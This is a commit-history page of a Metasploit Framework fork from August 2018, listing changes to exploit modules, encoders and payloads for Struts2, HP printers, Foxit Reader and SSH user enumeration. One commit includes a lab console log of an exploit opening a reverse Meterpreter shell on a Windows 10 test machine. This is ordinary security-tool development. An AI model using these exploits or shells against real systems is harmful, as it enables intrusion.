adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
48,129 Commits 27 Branches 1,043 Tags
562fc09d5d9974dbffa5b60663c3c842e600af18
Commit Graph

24602 Commits

Author SHA1 Message Date
alpiste f1e4079641 move add_thread code to lib/rex/post/meterpreter/extensions/peinjector/peinjector.rb 2018-08-28 09:02:21 -05:00
alpiste 015abca8af MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste bb151bb727 MSFTidy module 2018-08-28 09:02:21 -05:00
alpiste 2251c4a712 Add peinjector post module 2018-08-28 09:02:21 -05:00
William Vu 7d21c2094e Improve PSH target and refactor check code 2018-08-27 20:18:35 -05:00
William Vu df5f4caaae Uncomment PSH target in struts2_rest_xstream 
I'm full of shit. It works.

msf5 exploit(multi/http/struts2_rest_xstream) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Powershell command length: 2467
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49691) at 2018-08-27 20:00:47 -0500

meterpreter > getuid
Server username: MSEDGEWIN10\IEUser
meterpreter > sysinfo
Computer        : MSEDGEWIN10
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
 2018-08-27 20:01:00 -05:00
Brent Cook 53b369d702 avoid inserting a float into instruction generation randomly 2018-08-27 11:24:38 -05:00
Brent Cook 47ca6c6a14 Land #10527, Fix msftdiy EDB link check, enable HTTPS 2018-08-27 10:49:20 -05:00
Jacob Robles 79b3e4564a Land #10487, add php5 session file target 2018-08-27 06:22:28 -05:00
Brendan Coles 9725e90ba7 Fix msftdiy EDB link check 2018-08-26 04:18:38 +00:00
Brent Cook cb07ba2b6c Land #10516, Add brace expansion encoder and update ${IFS} encoder 2018-08-25 22:23:07 -05:00
William Vu 6df235062b Land #10505, post-auth and default creds info 2018-08-24 18:08:15 -05:00
Brent Cook 51c024982c Land #8914, refactor auxiliary/admin/http credential storage 2018-08-24 13:18:32 -05:00
Brent Cook 0141fc109d don't backtrace if there is not a response 2018-08-24 13:17:06 -05:00
Jacob Robles f6674a96d9 Update poc link 2018-08-24 10:52:01 -05:00
Jacob Robles 7f3824b067 Additional path for Linux target 2018-08-24 07:18:24 -05:00
William Vu 672dbb7acb Land #9364, HP PJL/SNMP CVE-2017-2741 exploit 
Finally!
 2018-08-23 22:47:09 -05:00
William Vu 318ff95dbd Remove trailing whitespace from netcat payloads 
This has been bugging me for so long.
 2018-08-23 21:33:58 -05:00
William Vu 4ff2c1dbe8 Add brace expansion encoder 2018-08-23 21:33:43 -05:00
William Vu eeea3356ae Update ${IFS} encoder 2018-08-23 21:33:42 -05:00
Wei Chen 2193dd662d Land #10504, add Foxit Reader UAF Module and Docs 2018-08-23 18:56:07 -05:00
Matthew Kienow ecc6c473d8 Add note about unauthenticated telnetd service 2018-08-23 15:50:41 -04:00
Jacob Robles 7ceae8df58 Remove '.exe' from share name 2018-08-23 14:38:46 -05:00
Matthew Kienow 56433c8ed2 Functional decomposition refactor and cleanup 2018-08-23 15:23:42 -04:00
Matthew Kienow 961769c346 Fix SNMP Null class comparison 2018-08-23 15:23:42 -04:00
Matthew Kienow 9c05f14a70 Modify SNMP null and error handling 2018-08-23 15:23:42 -04:00
Matthew Kienow 934bb38a44 Omit parentheses for no argument method calls 2018-08-23 15:23:41 -04:00
Matthew Kienow c5958c6e38 Restore original rport value 2018-08-23 15:23:41 -04:00
Matthew Kienow 70a0b9b1be Remove payload RequiredCmd and reformat info 2018-08-23 15:23:41 -04:00
Matthew Kienow dafa62dec4 Use string interpolation over concatenation 2018-08-23 15:23:40 -04:00
Matthew Kienow 7c03454a0b Remove unnecessary explicit msf/core require 2018-08-23 15:23:40 -04:00
Matthew Kienow b1a308f3ae Remove final debug output 2018-08-23 15:23:40 -04:00
Matthew Kienow e21ea4180f Clean up module and payload 
Update module info, remove intermediate ARCH_ARMLE target, simply
options and add cleanup command so that the payload kills telnetd
 2018-08-23 15:23:40 -04:00
Matthew Kienow 81f1555439 Rename module, exploits multiple printer models 2018-08-23 15:23:40 -04:00
Matthew Kienow df18e354e1 Add bind_busybox_telnetd payload, misc cleanup 2018-08-23 15:23:39 -04:00
Matthew Kienow c0c3e12c74 WIP - hp officejet pro exploit, enhance PJL lib 2018-08-23 14:53:54 -04:00
William Vu 578d2375d7 Add full disclosure for CVE-2018-15473 2018-08-22 14:49:13 -05:00
Wei Chen b899839c53 Oops I made boo-boos 2018-08-21 08:53:43 -05:00
Wei Chen 2780ae6ba9 Update false negatives 2018-08-21 08:50:26 -05:00
Jacob Robles fd6880d0d0 Add Foxit Reader UAF Module and Docs 2018-08-21 08:21:51 -05:00
William Vu 06582a00a0 Add module doc for ssh_enumusers 
And update description in module.
 2018-08-20 19:26:51 -05:00
Wei Chen ad0291e552 Update false negatives 2018-08-20 18:08:19 -05:00
Brent Cook 11fee8fa2c Land #10471, Import target DefaultOptions into the datastore 2018-08-20 17:30:27 -05:00
Brent Cook d1b8846f12 Land #10479, Add CVE-2018-15473 to ssh_enumusers 2018-08-20 17:14:58 -05:00
William Vu 819b8504e2 Add a little better randomization 2018-08-20 17:10:14 -05:00
William Vu b38a442bb0 Refactor once more with feeling 
Also flesh out malformed-packet auth method. Let's not be lazy here. :-)
 2018-08-20 16:25:32 -05:00
Wei Chen 01ad152067 Update false negatives on post auth information 2018-08-20 16:05:58 -05:00
Brent Cook e8af2dd67c bool params are truthy, don't cast to a string 2018-08-20 15:53:49 -05:00
Wei Chen 3d0d8f7773 Update false negatives on post auth information 2018-08-20 15:43:07 -05:00
Auxilus 7c3810bbff fix match error in ppc simple nop generator 
before changes:
```
msf5 nop(ppc/simple) > generate 10
[-] Sled generation failed: undefined method `match' for true:TrueClass.
```

After changes
```
msf5 nop(ppc/simple) > generate 10
buf =
"\x7c\xf6\xc2\x15\x7c\xf6\xc2\x15"
```
 2018-08-20 23:16:32 +05:30